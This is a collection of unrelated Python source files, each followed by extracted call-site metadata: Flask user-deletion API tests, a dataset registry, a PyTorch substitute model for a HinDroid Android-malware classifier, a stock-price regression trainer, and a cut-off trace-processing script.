"flask_socketio.SocketIO",
"eventlet.monkey_patch",
"flask.Flask"
] | [((140, 163), 'eventlet.monkey_patch', 'eventlet.monkey_patch', ([], {}), '()\n', (161, 163), False, 'import eventlet\n'), ((228, 243), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (233, 243), False, 'from flask import Flask\n'), ((256, 270), 'flask_bootstrap.Bootstrap', 'Bootstrap', (['app'], {}), '(app)\n', (265, 270), False, 'from flask_bootstrap import Bootstrap\n'), ((282, 318), 'flask_socketio.SocketIO', 'SocketIO', (['app'], {'async_mode': '"""eventlet"""'}), "(app, async_mode='eventlet')\n", (290, 318), False, 'from flask_socketio import SocketIO\n')] |
"""
Author: <NAME>
Date: 15 May 2021
"""
import json
from copy import deepcopy
import pytest
from flask import Response
from tests.functional.utils import FlaskTestRig, login, token_auth_header_field
@FlaskTestRig.setup_app(n_users=3)
def test_delete_me_no_auth_401(client_factory, make_users, **kwargs):
"""
Validate an Unauthorised error is returned when attempting to delete
the current user.
:endpoint: /api/v1/users/me
:method: DELETE
:auth: False
:params: None
:status: 401
:response: An unauthorised error.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = {
"error": "Unauthorised",
"message": "Invalid credentials."
}
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users/me")
# Get JSON data returned.
data = json.loads(res.data)
# Verify response matches expected.
assert data == expected
assert res.status_code == 401
@FlaskTestRig.setup_app(n_users=3)
def test_delete_me_with_auth_user_200(client_factory, make_users, **kwargs):
"""
Validate the current user can close their account.
:endpoint: /api/v1/users/me
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: A list of user objects.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = [{"username": "tinybear433", "id": 0}]
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users/me", headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 200
login(rig.client, user, should_fail=True)
@FlaskTestRig.setup_app(n_users=3)
def test_delete_users_with_auth_user_401(client_factory, make_users, **kwargs):
"""
Validate a User role cannot bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 401
:response: 401 error and message.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = {
'error': 'Unauthorised',
'message': 'Invalid credentials.'
}
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users", headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 401
@FlaskTestRig.setup_app(n_users=10)
def test_delete_users_with_auth_admin_200(client_factory, make_users, **kwargs):
"""
Validate a Admin role can bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: id and username of deleted users.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
users_to_delete = {
"users": [
{"id": 0},
{"id": 2}
]
}
expected = rig.get_current_users(keep_email=True, keep_password=True)
expected = [expected[0], expected[2]]
expected_full = deepcopy(expected)
_ = [item.pop("last_login") for item in expected]
_ = [item.pop("email") for item in expected]
_ = [item.pop("password") for item in expected]
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True, admin_only=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete("/api/v1/users",
headers=token_auth_header_field(token),
data=json.dumps(users_to_delete))
# Verify response matches expected.
assert json.loads(res.data) == expected
assert res.status_code == 200
for user in expected_full:
login(rig.client, user, should_fail=True)
@FlaskTestRig.setup_app(n_users=10)
@pytest.mark.parametrize("user_id", [3, 4, 5, 6, 7])
def test_delete_user_id_with_auth_admin_200(user_id, client_factory, make_users, **kwargs):
"""
Validate a User role cannot bulk delete.
:endpoint: /api/v1/users
:method: DELETE
:auth: True (Token)
:params: None
:status: 200
:response: The username and id of the deleted user.
"""
rig: FlaskTestRig = FlaskTestRig.extract_rig_from_kwargs(kwargs)
expected = rig.get_current_users(keep_email=True, keep_password=True)[user_id]
expected_full = deepcopy(expected)
_ = [expected.pop(item) for item in ["email", "last_login", "password"]]
print(expected)
# Acquire login token for first user.
user = rig.get_first_user(keep_password=True, admin_only=True)
token = login(rig.client, user)
# Make request and gather response.
res: Response = rig.client.delete(f"/api/v1/users/{user_id}",
headers=token_auth_header_field(token))
# Verify response matches expected.
assert json.loads(res.data) == [expected]
assert res.status_code == 200
login(rig.client, expected_full, should_fail=True)
| [
"json.loads",
"json.dumps",
"tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs",
"pytest.mark.parametrize",
"copy.deepcopy",
"tests.functional.utils.token_auth_header_field",
"tests.functional.utils.FlaskTestRig.setup_app",
"tests.functional.utils.login"
] | [((216, 249), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (238, 249), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1026, 1059), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (1048, 1059), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1936, 1969), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(3)'}), '(n_users=3)\n', (1958, 1969), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2829, 2863), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(10)'}), '(n_users=10)\n', (2851, 2863), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4259, 4293), 'tests.functional.utils.FlaskTestRig.setup_app', 'FlaskTestRig.setup_app', ([], {'n_users': '(10)'}), '(n_users=10)\n', (4281, 4293), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4295, 4346), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""user_id"""', '[3, 4, 5, 6, 7]'], {}), "('user_id', [3, 4, 5, 6, 7])\n", (4318, 4346), False, 'import pytest\n'), ((614, 658), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (650, 658), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((899, 919), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (909, 919), False, 'import json\n'), ((1399, 1443), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (1435, 1443), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1604, 1627), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (1609, 1627), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1891, 1932), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {'should_fail': '(True)'}), '(rig.client, user, should_fail=True)\n', (1896, 1932), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2298, 2342), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (2334, 2342), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2547, 2570), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (2552, 2570), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3202, 3246), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (3238, 3246), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3489, 3507), 'copy.deepcopy', 'deepcopy', (['expected'], {}), '(expected)\n', (3497, 3507), False, 'from copy import deepcopy\n'), ((3785, 3808), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (3790, 3808), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4705, 4749), 'tests.functional.utils.FlaskTestRig.extract_rig_from_kwargs', 'FlaskTestRig.extract_rig_from_kwargs', (['kwargs'], {}), '(kwargs)\n', (4741, 4749), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4854, 4872), 'copy.deepcopy', 'deepcopy', (['expected'], {}), '(expected)\n', (4862, 4872), False, 'from copy import deepcopy\n'), ((5093, 5116), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {}), '(rig.client, user)\n', (5098, 5116), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((5428, 5478), 'tests.functional.utils.login', 'login', (['rig.client', 'expected_full'], {'should_fail': '(True)'}), '(rig.client, expected_full, should_fail=True)\n', (5433, 5478), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((1819, 1839), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (1829, 1839), False, 'import json\n'), ((2759, 2779), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (2769, 2779), False, 'import json\n'), ((4107, 4127), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (4117, 4127), False, 'import json\n'), ((4214, 4255), 'tests.functional.utils.login', 'login', (['rig.client', 'user'], {'should_fail': '(True)'}), '(rig.client, user, should_fail=True)\n', (4219, 4255), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((5354, 5374), 'json.loads', 'json.loads', (['res.data'], {}), '(res.data)\n', (5364, 5374), False, 'import json\n'), ((1735, 1765), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (1758, 1765), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((2675, 2705), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (2698, 2705), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((3951, 3981), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (3974, 3981), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n'), ((4026, 4053), 'json.dumps', 'json.dumps', (['users_to_delete'], {}), '(users_to_delete)\n', (4036, 4053), False, 'import json\n'), ((5270, 5300), 'tests.functional.utils.token_auth_header_field', 'token_auth_header_field', (['token'], {}), '(token)\n', (5293, 5300), False, 'from tests.functional.utils import FlaskTestRig, login, token_auth_header_field\n')] |
"""
model construction function
"""
import torch
import torch.nn as nn
from fvcore.common.registry import Registry
DATASET_REGISTRY=Registry("DATASET")
def build_dataset(dataset_name,mode,cfg,):
"""
:param cfg:
:param dataset_name: avenue
:param mode: train /test
:return:
"""
# print("MODEL_REGISTRY", MODEL_REGISTRY.__dict__)
# name=dataset_name.capitalize()
# init model with xavier
return DATASET_REGISTRY.get(dataset_name)(mode,cfg)
if __name__=="__main__":
print("dataset register")
| [
"fvcore.common.registry.Registry"
] | [((135, 154), 'fvcore.common.registry.Registry', 'Registry', (['"""DATASET"""'], {}), "('DATASET')\n", (143, 154), False, 'from fvcore.common.registry import Registry\n')] |
from __future__ import print_function
from scipy import sparse
import pandas as pd
import numpy as np
import argparse, os
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
from torch.optim.lr_scheduler import StepLR
from torch.utils.data import Dataset, DataLoader
from sklearn.metrics import classification_report, confusion_matrix
from src.imbalanced_dataset_sampler.imbalanced import ImbalancedDatasetSampler
def attack():
dataset = HindroidDataset(**dataset_args)
fit_substitute()
pass
def fit_substitute(train_dataset_args, test_dataset_args, no_cuda=False):
pass
# use_cuda = not no_cuda and torch.cuda.is_available()
# torch.manual_seed(args.seed)
# device = torch.device("cuda" if use_cuda else "cpu")
# train_kwargs = {'batch_size': batch_size}
# test_kwargs = {'batch_size': batch_size}
# if use_cuda:
# cuda_kwargs = {'num_workers': 1,
# 'pin_memory': True}
# train_kwargs.update(cuda_kwargs)
# test_kwargs.update(cuda_kwargs)
# train_dataset = HindroidDataset(**train_dataset_args)
# test_dataset = HindroidDataset(**test_dataset_args)
# train_dataset = HindroidDataset(**train_datset_args)
# train_loader = torch.utils.data.DataLoader(
# train_dataset,
# sampler = ImbalancedDatasetSampler(
# train_dataset,
# callback_get_label = hindroid_custom_get_label),
# **train_kwargs)
# test_loader = torch.utils.data.DataLoader(
# test_dataset,
# sampler = ImbalancedDatasetSampler(
# test_dataset,
# callback_get_label = hindroid_custom_get_label),
# **train_kwargs)
# model = HindroidSubstitute().to(device)
# optimizer = optim.Adadelta(model.parameters(), lr=args.lr)
# scheduler = StepLR(optimizer, step_size=1, gamma=args.gamma)
# for epoch in range(1, args.epochs + 1):
# train(args, model, device, train_loader, optimizer, epoch)
# test(model, device, test_loader)
# scheduler.step()
# torch.save(model.state_dict(), "mnist_cnn.pt")
class HindroidDataset(Dataset):
def __init__(self, features_path, labels_path, label_col='m2vDroid', transform=None):
'''
Creates a dataset from the A matrix representation of apps and their associated labels.
Parameters:
-------------------
features_path: Path to A matrix in sparse format.
labels_path: Path to labels in csv format.
label_col: Default 'm2vDroid'. Useful for specifying which kernel to use for HinDroid.
'''
self.features = sparse.load_npz(os.path.join(features_path))
self.feature_width = self.features.shape[1]
features_folder = os.path.split(features_path)[0]
self.features_idx = list(pd.read_csv(
os.path.join(features_folder, 'predictions.csv'),
usecols=['app'],
squeeze=True
))
self.transform = transform
try:
self.labels = pd.read_csv(
labels_path,
usecols=['app', label_col],
index_col = 'app',
squeeze=True
)
self.labels = self.labels[self.features_idx].values # align labels with features index
except (KeyError, ValueError) as e:
print(e)
print('Seems like you may be trying to use a different model. This class is setup for m2vDroid by default.')
print('For HinDroid you must specify `label_col` as either AAT, ABAT, APAT, ABPBTAT, or APBPTAT.')
assert (self.features.shape[0] == self.labels.size), 'Length mismatch between features and labels.'
def __len__(self):
return self.features.shape[0]
def __getitem__(self, idx):
if torch.is_tensor(idx):
idx = idx.tolist()
features = self.features[idx]
features = features.todense().astype('float').A
labels = self.labels[idx]
# if self.transform:
# features = self.transform(features)
# labels = self.transform(labels)
# sample = {'features': features, 'labels': labels}
return features, labels
def get_labels(self, idx):
return self.labels[idx]
def hindroid_custom_get_label(dataset, idx):
return dataset.get_labels(idx)
class HindroidSubstitute(nn.Module):
def __init__(self, n_features):
super(HindroidSubstitute, self).__init__()
self.layer_1 = nn.Linear(n_features, 64, bias=False)
# Linear - how to freeze layer ^
# biases = false
self.layer_2 = nn.Linear(64, 64, bias=False)
self.layer_3 = nn.Linear(64, 64, bias=False)
self.layer_4 = nn.Linear(64, 2, bias=False)
def forward(self, x):
if not torch.is_tensor(x):
x = torch.from_numpy(x)
x = x.view(x.shape[0], -1)
x = F.relu(self.layer_1(x))
x = F.relu(self.layer_2(x))
x = F.relu(self.layer_3(x))
x = self.layer_4(x)
return x # logits
def train(model, device, train_loader, optimizer, epoch, weight=None):
model.train()
for batch_idx, (data, target) in enumerate(train_loader):
data, target = data.to(device), target.to(device)
optimizer.zero_grad()
output = F.log_softmax(model(data), dim=1)
loss = F.nll_loss(output, target, weight=weight) # do we use different loss?
loss.backward()
optimizer.step()
# logging
log_interval = 10
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
# if batch_idx % args.log_interval == 0:
# print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
# epoch, batch_idx * len(data), len(train_loader.dataset),
# 100. * batch_idx / len(train_loader), loss.item()))
# if args.dry_run:
# break
def test(model, device, test_loader, weight=None):
model.eval()
test_loss = 0
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.to(device), target.to(device)
output = model(data)
output = F.log_softmax(output, dim=1)
loss = F.nll_loss(output, target, weight=weight, reduction='sum').item() # sum up batch loss
test_loss += loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
test_loss /= len(test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset))) | [
"pandas.read_csv",
"torch.nn.functional.nll_loss",
"os.path.join",
"torch.from_numpy",
"os.path.split",
"torch.is_tensor",
"torch.nn.Linear",
"torch.nn.functional.log_softmax",
"torch.no_grad"
] | [((3932, 3952), 'torch.is_tensor', 'torch.is_tensor', (['idx'], {}), '(idx)\n', (3947, 3952), False, 'import torch\n'), ((4667, 4704), 'torch.nn.Linear', 'nn.Linear', (['n_features', '(64)'], {'bias': '(False)'}), '(n_features, 64, bias=False)\n', (4676, 4704), True, 'import torch.nn as nn\n'), ((4794, 4823), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(64)'], {'bias': '(False)'}), '(64, 64, bias=False)\n', (4803, 4823), True, 'import torch.nn as nn\n'), ((4847, 4876), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(64)'], {'bias': '(False)'}), '(64, 64, bias=False)\n', (4856, 4876), True, 'import torch.nn as nn\n'), ((4900, 4928), 'torch.nn.Linear', 'nn.Linear', (['(64)', '(2)'], {'bias': '(False)'}), '(64, 2, bias=False)\n', (4909, 4928), True, 'import torch.nn as nn\n'), ((5534, 5575), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output', 'target'], {'weight': 'weight'}), '(output, target, weight=weight)\n', (5544, 5575), True, 'import torch.nn.functional as F\n'), ((6405, 6420), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (6418, 6420), False, 'import torch\n'), ((2740, 2767), 'os.path.join', 'os.path.join', (['features_path'], {}), '(features_path)\n', (2752, 2767), False, 'import argparse, os\n'), ((2847, 2875), 'os.path.split', 'os.path.split', (['features_path'], {}), '(features_path)\n', (2860, 2875), False, 'import argparse, os\n'), ((3136, 3223), 'pandas.read_csv', 'pd.read_csv', (['labels_path'], {'usecols': "['app', label_col]", 'index_col': '"""app"""', 'squeeze': '(True)'}), "(labels_path, usecols=['app', label_col], index_col='app',\n squeeze=True)\n", (3147, 3223), True, 'import pandas as pd\n'), ((4971, 4989), 'torch.is_tensor', 'torch.is_tensor', (['x'], {}), '(x)\n', (4986, 4989), False, 'import torch\n'), ((5007, 5026), 'torch.from_numpy', 'torch.from_numpy', (['x'], {}), '(x)\n', (5023, 5026), False, 'import torch\n'), ((6579, 6607), 'torch.nn.functional.log_softmax', 'F.log_softmax', (['output'], {'dim': '(1)'}), '(output, dim=1)\n', (6592, 6607), True, 'import torch.nn.functional as F\n'), ((2937, 2985), 'os.path.join', 'os.path.join', (['features_folder', '"""predictions.csv"""'], {}), "(features_folder, 'predictions.csv')\n", (2949, 2985), False, 'import argparse, os\n'), ((6627, 6685), 'torch.nn.functional.nll_loss', 'F.nll_loss', (['output', 'target'], {'weight': 'weight', 'reduction': '"""sum"""'}), "(output, target, weight=weight, reduction='sum')\n", (6637, 6685), True, 'import torch.nn.functional as F\n')] |
# importing libraries
import warnings
warnings.filterwarnings("ignore")
import sys
import pandas as pd
import numpy as np
from matplotlib import pyplot as plt
import xgboost as xgb
from catboost import CatBoostRegressor
import lightgbm as lgb
from sqlalchemy import create_engine
import pickle
from sklearn.metrics import r2_score,mean_absolute_error
train_period = 7
predict_period = 1
n_day_later_predict= 7
def get_rolling_data(X,y,train_period,predict_period=1,n_day_later_predict=1):
"""
Generating Timeseries Input And Output Data.
Parameters:
X,y (DataFrame): Features,Labels
train_period (int): Timesteps For Model
predict_period (int): Predict On The nth Day Of The End Of The Training Window
Returns:
rolling_X (DataFrame): Features
rolling_y (DataFrame): Labels
"""
assert X.shape[0] == y.shape[0], (
'X.shape: %s y.shape: %s' % (X.shape, y.shape))
rolling_X, rolling_y = [],[]
for i in range(len(X)-train_period-predict_period-(n_day_later_predict)):
curr_X=X.iloc[i:i+train_period,:]
curr_y=y.iloc[i+train_period+n_day_later_predict:i+train_period+predict_period+n_day_later_predict]
rolling_X.append(curr_X.values.tolist())
if predict_period == 1:
rolling_y.append(curr_y.values.tolist()[0])
else:
rolling_y.append(curr_y.values.tolist())
rolling_X = np.array(rolling_X)
rolling_y = np.array(rolling_y)
return rolling_X, rolling_y
def load_data(database_filepath):
"""
Loading Data From Database.
Splitting X And Y Columns As TimeSeries Data By Calling get_rolling_data Method.
Parameters:
database_filepath (str): Filepath Where Database Is Located.
Returns:
X (DataFrame): Features
Y (DataFrame): Labels
"""
# loading data from database
db_name = 'sqlite:///{}'.format(database_filepath)
engine = create_engine(db_name)
# using pandas to read table from database
df = pd.read_sql_table('Stock',engine)
rolling_X, rolling_y = get_rolling_data(df, df.loc[:,'Stock_Adj Close'], train_period=train_period,
predict_period=predict_period,
n_day_later_predict=n_day_later_predict)
return rolling_X , rolling_y
class ModelData():
'''Data Class For Model Train, Predict And Validate.'''
def __init__(self,X,y,seed=None,shuffle=True):
self._seed = seed
np.random.seed(self._seed)
assert X.shape[0] == y.shape[0], (
'X.shape: %s y.shape: %s' % (X.shape, y.shape))
self._num_examples = X.shape[0]
# If shuffle
if shuffle:
np.random.seed(self._seed)
randomList = np.arange(X.shape[0])
np.random.shuffle(randomList)
self._X, self._y = X[randomList], y[randomList]
self._X = X
self._y = y
self._epochs_completed = 0
self._index_in_epoch = 0
def train_validate_test_split(self,validate_size=0.10,test_size=0.10):
'''Train, Predict And Validate Splitting Function'''
validate_start = int(self._num_examples*(1-validate_size-test_size)) + 1
test_start = int(self._num_examples*(1-test_size)) + 1
if validate_start > len(self._X) or test_start > len(self._X):
pass
train_X,train_y = self._X[:validate_start],self._y[:validate_start]
validate_X, validate_y = self._X[validate_start:test_start],self._y[validate_start:test_start]
test_X,test_y = self._X[test_start:],self._y[test_start:]
if test_size == 0:
return ModelData(train_X,train_y,self._seed), ModelData(validate_X,validate_y,self._seed)
else:
return ModelData(train_X,train_y,self._seed), ModelData(validate_X,validate_y,self._seed), ModelData(test_X,test_y,self._seed)
@property
def X(self):
return self._X
@property
def y(self):
return self._y
def build_model():
"""
Build Model Function.
This Function's Output Is A Dictionary Of 3 Best Regressor Models i.e. XGB Regressor,
Catboost Regressor And LGBM Regressor.
Returns:
model (Dict) : A Dictionary Of Regressor Models
"""
# xgb regressor
xgb_reg = xgb.XGBRegressor(n_estimators=10000,min_child_weight= 40,learning_rate=0.01,colsample_bytree = 1,subsample = 0.9)
# catboost regressor
cat_reg = CatBoostRegressor(iterations=10000,learning_rate=0.005,loss_function = 'RMSE')
# lgbm regressor
lgbm_reg = lgb.LGBMRegressor(num_leaves=31,learning_rate=0.001, max_bin = 30,n_estimators=10000)
model = {'xgb':xgb_reg,'cat':cat_reg,'lgbm':lgbm_reg}
return model
def evaluate_model(model, X_test, Y_test):
"""
Model Evaluation Function.
Evaluating The Models On Test Set And Computing R2 Score And Mean Absolute Error.
Parameters:
model (Dict) : A Dictionary Of Trained Regressor Models
X_test (DataFrame) : Test Features
Y_test (DataFrame) : Test Labels
"""
# predict on test data
pred = (model['xgb'].predict(X_test) + model['cat'].predict(X_test) + model['lgbm'].predict(X_test)) / 3
# rescaling the predictions
real = np.exp(Y_test)
pred = np.exp(pred)
# computing the r2 score
print('R2 Score :')
print(r2_score(real,pred))
# computing the mean absolute error
print('Mean Absolute Error :')
print(mean_absolute_error(real,pred))
def save_model(model, model_filepath):
"""
Save Model function
This Function Saves Trained Models As Pickle File, To Be Loaded Later.
Parameters:
model (Dict) : A Dictionary Of Trained Regressor Models
model_filepath (str) : Destination Path To Save .pkl File
"""
filename = model_filepath
pickle.dump(model, open(filename, 'wb'))
def main():
if len(sys.argv) == 3:
database_filepath, model_filepath = sys.argv[1:]
print('Loading data...\n DATABASE: {}'.format(database_filepath))
X, Y = load_data(database_filepath)
model_data = ModelData(X, Y,seed=666,shuffle=False)
model_train_data, model_validate_data = model_data.train_validate_test_split(validate_size=0.10,test_size=0)
y_train = model_train_data.y[:,np.newaxis]
y_validate = model_validate_data.y[:,np.newaxis]
X_train = model_train_data.X
X_validate = model_validate_data.X
X_train = X_train.reshape((X_train.shape[0],X_train.shape[1]*X_train.shape[2]))
X_validate = X_validate.reshape((X_validate.shape[0],X_validate.shape[1]*X_validate.shape[2]))
print('Building model...')
model = build_model()
print('Training XGB model...')
model['xgb'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300])],early_stopping_rounds = 50,verbose = False)
print('Training Catboost model...')
model['cat'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300])],early_stopping_rounds = 50,verbose = False)
print('Training Lgbm model...')
model['lgbm'].fit(X_train, y_train,eval_set = [(X_validate[:300],y_validate[:300].ravel())],early_stopping_rounds = 50,verbose = False)
print('Evaluating Combined model...')
evaluate_model(model, X_validate, y_validate)
print('Saving model...\n MODEL: {}'.format(model_filepath))
save_model(model, model_filepath)
print('Trained model saved!')
else:
print('Please provide the filepath of the Stock database '\
'as the first argument and the filepath of the pickle file to '\
'save the model to as the second argument. \n\nExample: python '\
'train_regressor.py ../data/Stock.db regressor.pkl')
if __name__ == '__main__':
main()
| [
"sqlalchemy.create_engine",
"lightgbm.LGBMRegressor",
"catboost.CatBoostRegressor",
"numpy.array",
"xgboost.XGBRegressor",
"numpy.exp",
"numpy.random.seed",
"pandas.read_sql_table",
"sklearn.metrics.mean_absolute_error",
"sklearn.metrics.r2_score",
"warnings.filterwarnings",
"numpy.arange",
... | [((38, 71), 'warnings.filterwarnings', 'warnings.filterwarnings', (['"""ignore"""'], {}), "('ignore')\n", (61, 71), False, 'import warnings\n'), ((1432, 1451), 'numpy.array', 'np.array', (['rolling_X'], {}), '(rolling_X)\n', (1440, 1451), True, 'import numpy as np\n'), ((1468, 1487), 'numpy.array', 'np.array', (['rolling_y'], {}), '(rolling_y)\n', (1476, 1487), True, 'import numpy as np\n'), ((1959, 1981), 'sqlalchemy.create_engine', 'create_engine', (['db_name'], {}), '(db_name)\n', (1972, 1981), False, 'from sqlalchemy import create_engine\n'), ((2039, 2073), 'pandas.read_sql_table', 'pd.read_sql_table', (['"""Stock"""', 'engine'], {}), "('Stock', engine)\n", (2056, 2073), True, 'import pandas as pd\n'), ((4411, 4528), 'xgboost.XGBRegressor', 'xgb.XGBRegressor', ([], {'n_estimators': '(10000)', 'min_child_weight': '(40)', 'learning_rate': '(0.01)', 'colsample_bytree': '(1)', 'subsample': '(0.9)'}), '(n_estimators=10000, min_child_weight=40, learning_rate=\n 0.01, colsample_bytree=1, subsample=0.9)\n', (4427, 4528), True, 'import xgboost as xgb\n'), ((4564, 4642), 'catboost.CatBoostRegressor', 'CatBoostRegressor', ([], {'iterations': '(10000)', 'learning_rate': '(0.005)', 'loss_function': '"""RMSE"""'}), "(iterations=10000, learning_rate=0.005, loss_function='RMSE')\n", (4581, 4642), False, 'from catboost import CatBoostRegressor\n'), ((4679, 4768), 'lightgbm.LGBMRegressor', 'lgb.LGBMRegressor', ([], {'num_leaves': '(31)', 'learning_rate': '(0.001)', 'max_bin': '(30)', 'n_estimators': '(10000)'}), '(num_leaves=31, learning_rate=0.001, max_bin=30,\n n_estimators=10000)\n', (4696, 4768), True, 'import lightgbm as lgb\n'), ((5439, 5453), 'numpy.exp', 'np.exp', (['Y_test'], {}), '(Y_test)\n', (5445, 5453), True, 'import numpy as np\n'), ((5465, 5477), 'numpy.exp', 'np.exp', (['pred'], {}), '(pred)\n', (5471, 5477), True, 'import numpy as np\n'), ((2543, 2569), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (2557, 2569), True, 'import numpy as np\n'), ((5541, 5561), 'sklearn.metrics.r2_score', 'r2_score', (['real', 'pred'], {}), '(real, pred)\n', (5549, 5561), False, 'from sklearn.metrics import r2_score, mean_absolute_error\n'), ((5647, 5678), 'sklearn.metrics.mean_absolute_error', 'mean_absolute_error', (['real', 'pred'], {}), '(real, pred)\n', (5666, 5678), False, 'from sklearn.metrics import r2_score, mean_absolute_error\n'), ((2784, 2810), 'numpy.random.seed', 'np.random.seed', (['self._seed'], {}), '(self._seed)\n', (2798, 2810), True, 'import numpy as np\n'), ((2836, 2857), 'numpy.arange', 'np.arange', (['X.shape[0]'], {}), '(X.shape[0])\n', (2845, 2857), True, 'import numpy as np\n'), ((2870, 2899), 'numpy.random.shuffle', 'np.random.shuffle', (['randomList'], {}), '(randomList)\n', (2887, 2899), True, 'import numpy as np\n')] |
from geosolver.utils.prep import sentence_to_words_statements_values
__author__ = 'minjoon'
def test_prep():
paragraph = r"If \sqrt{x+5}=40.5, what is x+5?"
print(sentence_to_words_statements_values(paragraph))
if __name__ == "__main__":
test_prep()
| [
"geosolver.utils.prep.sentence_to_words_statements_values"
] | [((173, 219), 'geosolver.utils.prep.sentence_to_words_statements_values', 'sentence_to_words_statements_values', (['paragraph'], {}), '(paragraph)\n', (208, 219), False, 'from geosolver.utils.prep import sentence_to_words_statements_values\n')] |
## Creates oracular traces from network traces, used for calculating self-inflicted delay
import glob
import os
import re
import sys
INPUT_PATH = 'cleaned_traces'
OUTPUT_PATH = 'oracular_traces'
def create_oracular_trace(filePath, targetFilePath, mode):
with open(filePath) as f:
with open(targetFilePath, 'w+') as wf:
